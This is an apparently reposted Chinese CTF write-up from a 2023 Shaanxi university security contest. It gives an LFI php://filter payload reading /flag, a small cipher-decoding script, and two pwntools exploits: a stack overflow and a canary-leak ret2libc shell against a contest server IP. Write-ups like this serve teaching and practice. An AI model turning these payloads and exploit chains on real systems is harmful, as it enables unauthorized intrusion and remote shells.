第三届陕西大学生网安技能大赛部分WP

WriteUp 11个月前 admin
332 0 0

第三届陕西大学生网安技能大赛部分WP

团队成员Laela带着两位大一的新人,打了这场比赛,选择的是职业院校组,一看是某草的平台,怪不到到了下午,Web题目就集体下线,在重新上线。最后成绩,到了下午就掉下来了,全国排名34,也算一个中等的成绩吧,毕竟老带新,自己做,也是需要时间的。

WEB

EzRCE

1.第三届陕西大学生网安技能大赛部分WP

2.第三届陕西大学生网安技能大赛部分WP

3.?PK=php://filter/read=convert.base64-encode/resource=/flag


Misc

云缨

1.第三届陕西大学生网安技能大赛部分WP                  
2.
第三届陕西大学生网安技能大赛部分WP

    a='8881088410842088810810842042108108821041010882108881'                  s=a.split('0')                  print(s)                  l=[]                  for i in s:                      sum=0                      for j in i:                          sum+=eval(j)                      l.append(chr(sum+64))                  print(''.join(l))

    PWN

    stack

    第三届陕西大学生网安技能大赛部分WP

      from pwn import *                               #p=process('nc 60.204.130.55 10005 ',shell=True)                               p=remote('60.204.130.55',10005)                p.recvuntil('?n')                p.sendline('a')                               p.recvuntil('?n')                payload='a'*152+p64(0x00000000004005d6)+p64(0x40082d)                p.sendline(payload)                p.interactive()

      canary

      第三届陕西大学生网安技能大赛部分WP

        from pwn import *                import ctypes                context.log_level='debug'                pop_rdi=0x0000000000400b93                p=process('nc 60.204.130.55 10004 ',shell=True)                p.recvuntil(':')                p.sendline('1')                p.recvuntil('Game Go:n')                libb=ELF('/lib/x86_64-linux-gnu/libc.so.6')                libc=ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')                seed=libc.time(0)                libc.srand(seed)                               p.sendline(str(libc.rand() % 100 + 1))                p.recv(0x48)                canary=u64(p.recv(8))                p.recv(8)                libcbase=u64(p.recvuntil(b'x7f').ljust(8,b'x00'))-171408                print(hex(libcbase))                system=libb.sym['system']+libcbase                binsh=libcbase+0x00000000001d8698                payload=b'a'*0x28+p64(canary)+p64(0x0)+p64(0x000000000040073e)+p64(pop_rdi)+p64(binsh)+p64(system)                p.sendline(payload)                p.interactive()


        原文始发于微信公众号(衡阳信安):第三届陕西大学生网安技能大赛部分WP

        版权声明:admin 发表于 2023年6月4日 下午8:38。
        转载请注明:第三届陕西大学生网安技能大赛部分WP | CTF导航

        相关文章

        暂无评论

        您必须登录才能参与评论!
        立即登录
        暂无评论...